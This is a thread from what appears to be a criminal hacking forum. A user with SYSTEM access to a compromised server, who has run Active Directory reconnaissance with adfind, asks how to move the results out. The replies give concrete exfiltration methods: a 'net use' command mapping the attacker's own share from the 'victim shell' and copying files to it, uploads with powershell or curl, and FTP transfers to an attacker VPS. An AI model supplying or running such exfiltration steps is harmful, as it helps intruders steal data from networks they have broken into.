• XSS.stack #1 – первый литературный журнал от юзеров форума

need help with network access

leaksmartass

HDD-drive
Забанен
Регистрация
15.08.2022
Сообщения
24
Реакции
0
Пожалуйста, обратите внимание, что пользователь заблокирован
hello i have a cmd access into a server

but the access isn't interactive webshell

i have nt system

i ran adfind.exe and got results

ihave the results in .txt how to transfer it to my window system ? any method to transfer files from cmd to another outside machine, tried alot nothing worked
( tried to open rdp no result )
 
Just upload the file to a server you control,or another hosting platform.

"any method to transfer files from cmd" you mean using cli? You don't have gui access to the server so use powershell,curl or a custom binary/script to exfil.
 
Последнее редактирование:
hello i have a cmd access into a server

but the access isn't interactive webshell

i have nt system

i ran adfind.exe and got results

ihave the results in .txt how to transfer it to my window system ? any method to transfer files from cmd to another outside machine, tried alot nothing worked
( tried to open rdp no result )
If you have your own Windows host, mount its disk, and copy the files there, for example:
Код:
# 192.168.06.66 - your windows host with c$ share
# Administrator - login for your windows
# Passw0rd123# - password for your windows host
# in victim shell just run
C:\> net use X: \\192.168.06.66\c$ /user:192.168.06.66\Administrator Passw0rd123#
C:\> copy C:\programdata\yourfile.txt X:\programdata\yourfile.txt
 
Пожалуйста, обратите внимание, что пользователь заблокирован
If you have your own Windows host, mount its disk, and copy the files there, for example:
Код:
# 192.168.06.66 - your windows host with c$ share
# Administrator - login for your windows
# Passw0rd123# - password for your windows host
# in victim shell just run
C:\> net use X: \\192.168.06.66\c$ /user:192.168.06.66\Administrator Passw0rd123#
C:\> copy C:\programdata\yourfile.txt X:\programdata\yourfile.txt
can it be used for outside of network ? like external ip addr
 
hello i have a cmd access into a server

but the access isn't interactive webshell

i have nt system

i ran adfind.exe and got results

ihave the results in .txt how to transfer it to my window system ? any method to transfer files from cmd to another outside machine, tried alot nothing worked
( tried to open rdp no result )
on ur vps setup ftp server (1 command with python) and then use put to upload file on ur server.It can be done in 1 command
 
or you can just pipe it as object to the terminal screen with out-host if a GP or advfirewall refuses
 
Пожалуйста, обратите внимание, что пользователь заблокирован
get a random free host ftp hosting
then go to cmd
ftp yourftp server
enter
your username
enter
your password
enter

after that user the command "get"
for exemple:
get file.zip
get file.doc
get file.txt
etc
simple
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх